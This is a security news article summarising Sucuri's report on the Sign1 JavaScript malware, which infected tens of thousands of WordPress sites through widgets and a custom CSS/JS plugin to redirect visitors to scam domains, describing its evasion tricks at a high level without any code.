More than 39,000 websites have been infected with a new malware family that redirects visitors to scam domains and displays unwanted ads, website security firm Sucuri warns.
Dubbed Sign1, the JavaScript malware was found inside WordPress custom HTML widgets or within the Simple Custom CSS and JS WordPress plugin that the attackers added to the compromised websites.
“Using this method, hackers infect websites without placing any malicious code into server files which allows the malware to stay unnoticed for a long time — as it’s much more common for security providers to scan website files for malware than to check in the database,” Sucuri says.
The injected code is responsible for changing every 10 minutes the URL to be executed in the victim’s browser, leading to unwanted redirects to VexTrio domains.
The malware, however, uses obfuscation to hide its presence and would only execute if the visitor comes from a major website, such as Facebook, Google, Instagram, or Yahoo.
“This is a common trait of malware as it tends to allow the infection to stay unnoticed for a longer time (normally a website owner will navigate to their website directly, rather than through a search engine),” Sucuri notes.
The security firm also discovered that the JavaScript code sets a specific cookie so that it would not detonate and display the unwanted pop-up multiple times for the same visitor.
Furthermore, the execution is conditioned by the existence of a hexadecimal-string JavaScript file that matches a specific 10-minute interval.
“If these conditions are met, then the malware is injected and executes yet another script passing the URL of the current page, the referrer, and the browser language as a base64-encoded parameter. This script works as a TDS and redirects users further to malicious sites (usually the VexTrio scam sites),” Sucuri says.
Over the past six months, the security firm identified over 39,000 sites infected with different variants of the malware, with the most recent of them infecting more than 2,500 sites in the past two months.
Sucuri identified 15 domains used in this malicious campaign. Eight of them have been used in thousands of infections each.
Related: New Attack Shows Risks of Browsers Giving Websites Access to GPU
Related: Websites Hacked via Vulnerability in Bricks Builder WordPress Plugin
Related: Millions of User Records Stolen From 65 Websites via SQL Injection Attacks
